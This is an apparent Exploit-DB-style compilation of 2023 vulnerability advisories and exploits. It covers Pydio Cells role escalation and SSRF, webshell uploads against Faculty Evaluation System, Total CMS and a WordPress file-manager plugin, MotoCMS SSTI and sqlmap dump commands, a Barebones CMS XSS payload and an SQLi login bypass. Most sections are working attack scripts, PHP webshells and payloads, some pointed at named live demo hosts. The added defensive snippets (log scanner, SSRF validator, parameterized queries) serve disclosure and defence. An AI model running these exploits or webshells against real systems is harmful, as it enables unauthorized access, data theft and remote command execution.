2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released


References
==========

[1] https://aws.amazon.com/sdk-for-javascript/


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Alter Posthof 1                           Fax : +49 241 510081-99
52062 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschäftsführer:                       Patrick Hof, Jens Liebchen
            
Exploit Title: Pydio Cells 4.1.2 - Unauthorised Role Assignments
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Privilege Escalation
Security Risk: high
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-003
Advisory Status: published
CVE: CVE-2023-32749
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32749


Introduction
============

"Pydio Cells is an open-core, self-hosted Document Sharing and
Collaboration platform (DSC) specifically designed for organizations
that need advanced document sharing and collaboration without security
trade-offs or compliance issues."

(from the vendor's homepage)


More Details
============

Users can share cells or folders with other users on the same Pydio
instance. The web application allows either selecting an already
existing user from a list or, if this functionality is enabled, creating
a new user by entering a new username and password. When creating a
new user in this way, an HTTP PUT request like the following is sent:

------------------------------------------------------------------------
PUT /a/user/newuser HTTP/2
Host: example.com
User-Agent: agent
Authorization: Bearer O48gvjD[...]
Content-Type: application/json
Content-Length: 628
Cookie: token=AO[...]

{
  "Attributes": {
    "profile": "shared",
    "parameter:core.conf:lang": "\"en-us\"",
    "send_email": "false"
  },
  "Roles": [],
  "Login": "newuser",
  "Password": "secret!",
  "GroupPath": "/",
  "Policies": [...]
}
------------------------------------------------------------------------

The JSON object sent in the body contains the username and password
for the user to be created and an empty list for the key "Roles". The
response contains a JSON object similar to the following:

------------------------------------------------------------------------
{
  "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
  "GroupPath": "/",
  "Attributes": {
    "parameter:core.conf:lang": "\"en-us\"",
    "profile": "shared"
  },
  "Roles": [
    {
      "Uuid": "EXTERNAL_USERS",
      "Label": "External Users",
      "Policies": [...]
    },
    {
      "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
      "Label": "User newuser",
      "UserRole": true,
      "Policies": [...]
    }
  ],
  "Login": "newuser",
  "Policies": [....],
  "PoliciesContextEditable": true
}
------------------------------------------------------------------------

The key "Roles" now contains a list with two objects, which seem to be
applied by default. The roles list in the HTTP request can be
modified to contain a list of all available UUIDs for roles, which can
be obtained by using the user search functionality. This results in a
new user account with all roles applied. By performing a login as the
newly created user, access to all cells and non-personal workspaces of
the whole Pydio instance is granted.


Proof of Concept
================

Log in to the Pydio Cells web interface with a regular user and retrieve
the JWT from the HTTP requests. This can be done either with an HTTP
attack proxy or with the browser's developer tools. Subsequently, curl [1]
can be used as follows to retrieve a list of all users and their roles:

------------------------------------------------------------------------
$ export JWT="<insert JWT here>"
$ curl --silent \
--header "Authorization: Bearer $JWT" \
--header 'Content-Type: application/json' \
--data '{}' \
https://example.com/a/user | tee all_users.json

{"Users":[...]}
------------------------------------------------------------------------

Afterwards, jq [2] can be used to create a JSON document which can be
sent to the Pydio REST-API in order to create the external user "foobar"
with the password "hunter2" and all roles assigned:

------------------------------------------------------------------------
$ jq '.Users[].Roles' all_users.json \
| jq -s 'flatten | .[].Uuid | {Uuid: .}' \
| jq -s 'unique' \
| jq '{"Login": "foobar", "Password": "hunter2", "Attributes":
{"profile": "shared"}, "Roles": .}' \
| tee create_user.json

{
  "Login": "foobar",
  "Password": "hunter2",
  "Attributes": {
    "profile": "shared"
  },
  "Roles": [...]
}
------------------------------------------------------------------------

Finally, the following curl command can be issued to create the new external
user:

------------------------------------------------------------------------
$ curl --request PUT \
--silent \
--header "Authorization: Bearer $JWT" \
--header 'Content-Type: application/json' \
--data @create_user.json \
https://example.com/a/user/foobar
------------------------------------------------------------------------

Now, log in with the newly created user to access all cells and
non-personal workspaces.

Workaround
==========

Disallow the creation of external users in the authentication settings.


Fix
===

Upgrade Pydio Cells to a version without the vulnerability.


Security Risk
=============

Attackers with access to any regular user account for a Pydio Cells instance can
extend their privileges by creating a new external user with all roles
assigned. Subsequently, they can access all folders and files in any
cell and workspace, except for personal workspaces. The creation of
external users is activated by default. Therefore, the vulnerability is
estimated to pose a high risk.


Timeline
========

2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released


References
==========

[1] https://curl.se/
[2] https://stedolan.github.io/jq/


            
# Exploit Title: Faculty Evaluation System 1.0 - Unauthenticated File Upload
# Date: 5/29/2023
# Author: Alex Gan
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip
# Version: 1.0
# Tested on: LAMP Fedora server 38 (Thirty Eight) Apache/2.4.57 10.5.19-MariaDB PHP 8.2.6
# CVE: CVE-2023-33440
# References: https://nvd.nist.gov/vuln/detail/CVE-2023-33440
#             https://www.exploit-db.com/exploits/49320
#             https://github.com/F14me7wq/bug_report/tree/main/vendors/oretnom23/faculty-evaluation-system
#
#!/usr/bin/env python3
import os
import sys
import requests
import argparse
from bs4 import BeautifulSoup
from urllib.parse import urlparse
from requests.exceptions import ConnectionError, Timeout

REQUEST_TIMEOUT = 10  # seconds; avoids hanging forever on an unresponsive host

def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', type=str, help='URL')
    parser.add_argument('-p', '--payload', type=str, help='PHP webshell')
    return parser.parse_args()

def get_user_input(args):
    # Fall back to interactive prompts when the arguments were not supplied
    if not args.url:
        args.url = input('Use the -u argument or Enter URL:')
    if not args.payload:
        args.payload = input('Use the -p argument or Enter file path PHP webshell: ')
    return args.url, args.payload

def check_input_url(url):
    # Prepend a scheme when missing and drop a trailing slash so paths can be appended
    if not urlparse(url).scheme:
        url = 'http://' + url
    return url.rstrip('/')

def check_host_availability(url):
    try:
        response = requests.head(url=url + '/login.php', timeout=REQUEST_TIMEOUT)
        if response.status_code == 200:
            print("[+] Host is accessible")
        else:
            print("[-] Host is not accessible")
            print("    Status code:", response.status_code)
            sys.exit()
    except (ConnectionError, Timeout):
        print("[-] Host is not accessible")
        sys.exit()
    except requests.exceptions.RequestException as e:
        print("[-] Error:", e)
        sys.exit()

def make_request(url, method, files=None):
    if method == 'GET':
        response = requests.get(url, timeout=REQUEST_TIMEOUT)
    elif method == 'POST':
        response = requests.post(url, files=files, timeout=REQUEST_TIMEOUT)
    else:
        raise ValueError(f'Invalid HTTP method: {method}')

    if response.status_code == 200:
        print('[+] Request successful')
        return response.text
    else:
        print(f'[-] Error {response.status_code}: {response.text}')
        return None

def find_file(response_get, filename, find_url):
    # Parse the directory listing and collect links ending in the uploaded file name
    soup = BeautifulSoup(response_get or '', 'html.parser')

    found_files = []
    for link in soup.find_all('a'):
        file_upl = link.get('href')
        if file_upl and file_upl.endswith(filename):
            found_files.append(file_upl)

    if found_files:
        print('    File found:')
        for file in found_files:
            print('[*] ' + file)

        print('    Full URL of your file:')
        for file_url in found_files:
            print('[*] ' + find_url + file_url)
    else:
        print('[-] File not found')

def main():
    args = get_args()
    url, payload = get_user_input(args)
    url = check_input_url(url)
    check_host_availability(url)

    post_url = url + "/ajax.php?action=save_user"  # upload endpoint that requires no login
    get_url = url + "/assets/uploads/"              # directory listing of uploaded files
    filename = os.path.basename(payload)

    print("    Loading payload file")
    with open(payload, 'rb') as fh:
        payload_file = [('img', (filename, fh, 'application/octet-stream'))]
        make_request(post_url, 'POST', files=payload_file)
    print("    Listing the uploads directory")
    response_get = make_request(get_url, 'GET')
    print("    Finding the uploaded payload file")
    find_file(response_get, filename, get_url)

if __name__ == "__main__":
    main()
            
# Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE)
# Date: 02/06/2023
# Exploit Author: tmrswrr
# Version: 1.7.4
# Vendor home page : https://www.totalcms.co/

1) Go to this page and click the "edit page" button:
https://www.totalcms.co/demo/soccer/
2) Scroll down until you see the downloads area.
3) Add a file named shell.php with the following content to this area (a PNG header followed by PHP code):


?PNG
...
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>
IEND

4) Open the uploaded file and pass commands through the cmd parameter:

https://www.totalcms.co/cms-data/depot/cmssoccerdepot/shell.php?cmd=id
Result:

?PNG ...

uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)

IEND
            
# Title: MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)
# Author: tmrswrr
# Date: 31/05/2023
# Vendor: https://www.motocms.com
# Link: https://www.motocms.com/website-templates/demo/189526.html
# Vulnerable Version(s): MotoCMS 3.0.27


## Description
MotoCMS Version 3.4.3 Store Category Template was discovered to contain a Server-Side Template
Injection (SSTI) vulnerability via the keyword parameter.

## Steps to Reproduce
1. Open the target URL: https://template189526.motopreview.com/
2. Place the payload in the keyword parameter: https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}}
3. The response contains the result 49.



Vulnerable URL: https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}}


GET /store/category/search/?page=&limit=&keyword={{7*7}} HTTP/1.1
Host: template189526.motopreview.com
Cookie: PHPSESSID=7c0qgdvsehaf1a2do6s0bcl4p0; 9b7029e0bd3be0d41ebefd47d9f5ae46_session-started=1685536759239
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://template189526.motopreview.com/store/category/search/?keyword=%7B%7B3*3%7D%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
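Probes like the one above leave a recognisable trace in web server logs. The following is an added example, not part of the advisory or of MotoCMS: it scans constructed access-log lines (client addresses, timestamps and paths are invented; the first line carries the URL-encoded form of the {{7*7}} probe) and reports every query parameter whose decoded value contains template delimiters. It generalises beyond the {{ }} form used here to two other common delimiter styles.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Template delimiters whose appearance in a request parameter is worth an alert.
# The {{ }} form is the one probed against MotoCMS above; the other two are
# included as a generalisation to other common template engines.
TEMPLATE_PATTERNS = {
    "double-brace {{ }}": re.compile(r"\{\{.+?\}\}", re.S),
    "erb-style <% %>": re.compile(r"<%.+?%>", re.S),
    "dollar-brace ${ }": re.compile(r"\$\{.+?\}", re.S),
}

# Combined-log-format request line: client, then the quoted "METHOD target HTTP/x.y".
REQUEST_LINE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = """203.0.113.5 - - [31/May/2023:12:01:03 +0000] "GET /store/category/search/?page=1&limit=36&keyword=%7B%7B7*7%7D%7D HTTP/1.1" 200 5120
203.0.113.5 - - [31/May/2023:12:01:09 +0000] "GET /store/category/search/?keyword=shoes HTTP/1.1" 200 4870
198.51.100.7 - - [31/May/2023:12:02:44 +0000] "POST /admin/upload?formats=test%3C%25%3D+7*7+%25%3Etest HTTP/1.1" 200 312
198.51.100.7 - - [31/May/2023:12:03:01 +0000] "GET /search?q=%24%7B7*7%7D HTTP/1.1" 200 900
192.0.2.9 - - [31/May/2023:12:04:00 +0000] "GET /store/category/search/?keyword=%7Bnot+a+template%7D HTTP/1.1" 200 4870
"""


def template_markers(value):
    """Names of the delimiter styles present in a decoded parameter value."""
    return [name for name, pattern in TEMPLATE_PATTERNS.items() if pattern.search(value)]


def scan_access_log(text):
    """One finding per query parameter whose decoded value contains template delimiters."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_LINE.match(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        # parse_qsl percent-decodes and turns '+' into a space, so the check
        # sees the value the application would see.
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            markers = template_markers(value)
            if markers:
                findings.append({
                    "client": match.group("client"),
                    "method": match.group("method"),
                    "path": parts.path,
                    "param": param,
                    "value": value,
                    "markers": markers,
                })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['client']} {f['method']} {f['path']} {f['param']}={f['value']!r} -> {', '.join(f['markers'])}")
```

Only the query string is inspected here; where request bodies are logged they need the same decoding and check, and a match is a reason to look at how the application builds templates from that parameter, not proof of exploitation by itself.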
            
# Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-03
# Exploit Author: tmrswrr
# Vendor Homepage: https://barebonescms.com/
# Software Link: https://github.com/cubiclesoft/barebones-cms/archive/master.zip
# Version: v2.0.2
# Tested : https://demo.barebonescms.com/


--- Description ---

1) Log in to the admin panel and go to "new story":
https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c01184323540
2) Click the edit button and write your payload in the title field:
Payload: "><script>alert(1)</script>
3) After saving the change, the alert is displayed.


POST /sessions/127.0.0.1/moors-sluses/admin/ HTTP/1.1
Host: demo.barebonescms.com
Cookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 237
Origin: https://demo.barebonescms.com
Dnt: 1
Referer: https://demo.barebonescms.com/sessions/78.163.184.240/moors-sluses/admin/?action=addeditasset&id=1&type=story&lang=en-us&sec_t=241bac393bb576b2538613a18de8c01184323540
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

action=saveasset&id=1&revision=0&type=story&sec_t=a6adec1ffa60ca5adf4377df100719b952d3f596&lang=en-us&title=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&newtag=&publish_date=2023-06-03&publish_time=12%3A07+am&unpublish_date=&unpublish_time=
            
Exploit Title: Pydio Cells 4.1.2 - Server-Side Request Forgery
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Server-Side Request Forgery
Security Risk: medium
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-005
Advisory Status: published
CVE: CVE-2023-32750
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32750


Introduction
============

"Pydio Cells is an open-core, self-hosted Document Sharing and
Collaboration platform (DSC) specifically designed for organizations
that need advanced document sharing and collaboration without security
trade-offs or compliance issues."

(from the vendor's homepage)


More Details
============

Using the REST-API of Pydio Cells it is possible to start jobs. For
example, when renaming a file or folder an HTTP request similar to the
following is sent:

------------------------------------------------------------------------
PUT /a/jobs/user/move HTTP/2
Host: example.com
User-Agent: agent
Accept: application/json
Authorization: Bearer G4ZRN[...]
Content-Type: application/json
Content-Length: 140

{
  "JobName": "move",
  "JsonParameters": "{\"nodes\":[\"cell/file.txt\"],\"target\":\"cell/renamed.txt\",\"targetParent\":false}"
}
------------------------------------------------------------------------

The body contains a JSON object with a job name and additional
parameters for the job. Besides the "move" job, a job with the name
"remote-download" also exists. It takes two additional parameters: "urls"
and "target". The "urls" parameter holds a list of URLs and the "target"
parameter a path under which the responses are saved. When the job is
started, HTTP GET requests are sent from the Pydio Cells server to the
specified URLs. Each response is saved into a file, which is uploaded to
the specified folder within Pydio Cells. Potential errors are transmitted
in a WebSocket channel, which can be opened through the "/ws/event"
endpoint.


Proof of Concept
================

Log into Pydio Cells and retrieve the JWT from the HTTP requests. Then,
run the following commands to start a "remote-download" job to trigger
an HTTP request:

------------------------------------------------------------------------
$ export JWT="<insert JWT here>"

$ echo '{"urls": ["http://localhost:8000/internal.html"], "target": "personal-files"}' \
| jq '{"JobName": "remote-download", "JsonParameters": (. | tostring)}' \
| tee remote-download.json

$ curl --header "Authorization: Bearer $JWT" \
--header 'Content-Type: application/json' \
--request PUT \
--data @remote-download.json 'https://example.com/a/jobs/user/remote-download'
------------------------------------------------------------------------

The URL in the JSON document specifies which URL to request. The "target"
field in the same document specifies into which folder the response is saved.
Afterwards, the response is contained in a file in the specified folder.
Potential errors are communicated through the WebSocket channel.


Workaround
==========

Limit the services which can be reached by the Pydio Cells server, for
example using an outbound firewall.
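Besides the outbound firewall, a server-side fetcher such as the "remote-download" job can refuse destinations before connecting. The following is an added example written for this advisory, not Pydio Cells code (Pydio Cells itself is written in Go; Python is used here for consistency with the other examples on this page). The hostnames and addresses in the usage are constructed, and the resolver is injectable so the check can be exercised without DNS.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def resolve_all(host):
    """All addresses a hostname currently resolves to (system resolver)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_allowed_fetch_target(url, resolve=resolve_all):
    """Decide whether a server-side fetcher may request `url`.

    Returns (allowed, reason). Rejects anything but http/https, URLs that
    carry credentials, and any destination resolving to a loopback, private,
    link-local, multicast or otherwise non-global address.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} is not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in the URL are not allowed"
    host = parts.hostname
    if not host:
        return False, "URL has no host"
    try:
        # IP literals need no lookup; hostnames go through the resolver.
        addresses = {str(ipaddress.ip_address(host))}
    except ValueError:
        try:
            addresses = resolve(host)
        except OSError as exc:
            return False, f"name resolution for {host!r} failed: {exc}"
    for address in addresses:
        ip = ipaddress.ip_address(address.split("%")[0])  # drop an IPv6 zone id if present
        # Unwrap IPv4-mapped IPv6 (::ffff:10.0.0.5) so the IPv4 range checks apply.
        if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped
        if not ip.is_global:
            return False, f"{host!r} resolves to non-public address {ip}"
    return True, f"{host!r} resolves to public addresses only"


if __name__ == "__main__":
    # Constructed examples; the second uses a stub resolver instead of DNS.
    print(is_allowed_fetch_target("http://localhost:8000/internal.html",
                                  resolve=lambda h: {"127.0.0.1"}))
    print(is_allowed_fetch_target("https://files.example/report.pdf",
                                  resolve=lambda h: {"11.22.33.44"}))
```

Two caveats a reviewer would raise: the name must not be resolved a second time when the connection is made, otherwise a record that changes between check and fetch (DNS rebinding) bypasses the test, so the fetcher should connect to the address that was validated; and every redirect target has to go through the same check, since a public host can redirect to an internal one.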


Fix
===

Upgrade Pydio Cells to a version without the vulnerability.


Security Risk
=============

The risk is highly dependent on the environment in which the attacked
Pydio Cells instance runs. If there are any internal HTTP services which
expose sensitive data on the same machine or within the same network,
the server-side request forgery vulnerability could pose a significant
risk. In other circumstances, the risk could be negligible. Therefore,
overall the vulnerability is rated as a medium risk.


Timeline
========

2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released


            
# Exploit Title: Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)
# Date found: 18/05/2023
# Exploit Author: VIVEK CHOUDHARY @sudovivek
# Version: V1.0
# Tested on: Windows 10
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14444/enrollment-system-project-source-code-using-phpmysql.html
# CVE: CVE-2023-33584
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33584

Vulnerability Description -

	Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.


Steps to Reproduce -

	The following steps outline the exploitation of the SQL Injection vulnerability in Enrollment System Project V1.0:

	1. Launch the Enrollment System Project V1.0 application.

	2. Open the login page by accessing the URL: http://localhost/enrollment/login.php.

	3. In the username and password fields, insert the following SQL Injection payload shown inside brackets to bypass authentication: {' or 1=1 #}.

	4. Click the login button to execute the SQL Injection payload.


As a result of successful exploitation, the attacker gains unauthorized access to the system and is logged in with administrative privileges.
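The root cause stated above, user input concatenated into the login query, and its fix are shown side by side below. This is an added example, not code from the Enrollment System Project: the user table is an in-memory SQLite stand-in with constructed data, and the bypass input uses SQLite's "--" line comment in place of the MySQL "#" comment in the write-up's payload, which is the only change made to it.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the application's user table (constructed data).
    Passwords are stored in clear only to keep the demonstration short."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password, role) VALUES ('admin', 'S3cret!', 'admin')"
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The bug class: user input becomes part of the SQL text itself."""
    sql = (
        "SELECT id, role FROM users WHERE username = '" + username + "' "
        "AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchone()


def login_fixed(conn, username, password):
    """The fix: placeholders bind the input as data, so quotes and comment
    markers inside it can never change the shape of the statement."""
    sql = "SELECT id, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


# Bypass input in SQLite comment syntax; the resulting vulnerable statement is
#   ... WHERE username = '' or 1=1 --' AND password = '...'
# so the password condition is commented away and the first row is returned.
BYPASS_INPUT = "' or 1=1 --"


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", login_vulnerable(conn, BYPASS_INPUT, "anything"))
    print("fixed:     ", login_fixed(conn, BYPASS_INPUT, "anything"))
```

The same placeholder style applies to PHP's MySQLi (`prepare`/`bind_param`) and PDO, which is where the original application would apply it.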
            
# Title: MotoCMS Version 3.4.3 - SQL Injection
# Author: tmrswrr
# Date: 01/06/2023
# Vendor: https://www.motocms.com
# Link: https://www.motocms.com/website-templates/demo/189526.html
# Vulnerable Version(s): MotoCMS 3.4.3


## Description
MotoCMS version 3.4.3 is vulnerable to SQL injection via the keyword parameter.

## Steps to Reproduce

1) Visit the URL:
https://template189526.motopreview.com/store/category/search/?keyword=1

2) Run sqlmap against it:
sqlmap -u "https://template189526.motopreview.com/store/category/search/?keyword=1" --random-agent --level 5 --risk 3 --batch
and then this command:
sqlmap -u "https://template189526.motopreview.com/store/category/search/?keyword=1*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump

### Parameter & Payloads ###

Parameter: keyword (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyword=1%' AND 3602=3602 AND 'ZnYV%'='ZnYV

Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://template189526.motopreview.com:443/store/category/search/?keyword=1%' AND 6651=6651 AND 'BvJE%'='BvJE
            
# Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)
# Date: 05/31/2023
# Exploit Author: Mateus Machado Tesser
# Vendor Homepage: https://advancedfilemanager.com/
# Version: File Manager Advanced Shortcode 2.3.2
# Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15
# CVE: CVE-2023-2068

import requests
import json
import sys
import re

PROCESS = "\033[1;34;40m[*]\033[0m"
SUCCESS = "\033[1;32;40m[+]\033[0m"
FAIL = "\033[1;31;40m[-]\033[0m"

# Usage: <script> IP COMMAND
if len(sys.argv) < 3:
    print(f'Use: {sys.argv[0]} IP COMMAND')
    sys.exit(1)
IP = sys.argv[1]
COMMAND = sys.argv[2]

url = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panel
print(f"{PROCESS} Searching fmakey")

# The page source contains a "_fmakey" assignment; take its single-quoted value
try:
    r = requests.get(url)
    fmakey = re.findall('_fmakey.*$', r.text, re.MULTILINE)[0].split("'")[1]
except (requests.RequestException, IndexError):
    fmakey = ""
if not fmakey:
    print(f"{FAIL} Cannot find fmakey!")
    sys.exit(1)

print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')
url = "http://"+IP+"/wp-admin/admin-ajax.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1", "Accept": "*/*"}
# Multipart body built by hand; note that upload_allow (the permitted MIME type) is sent by the client
data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n"
r = requests.post(url, headers=headers, data=data)
print(f"{PROCESS} Sending AJAX request to: {url}")
if 'errUploadMime' in r.text:
    print(f'{FAIL} Exploit failed!')
    sys.exit(1)
elif r.headers.get('Content-Type', '').startswith("text/html"):
    print(f'{FAIL} Exploit failed! Try to change _fmakey')
    sys.exit(1)
else:
    print(f'{SUCCESS} Exploit executed with success!')
exploited = json.loads(r.text)
url = ""
print(f'{PROCESS} Getting URL with webshell')
# The JSON response lists the added files; take the URL of the last one
for i in exploited["added"]:
    url = i['url']
print(f"{PROCESS} Executing '{COMMAND}'")
r = requests.get(url+'?cmd='+COMMAND)
print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text)
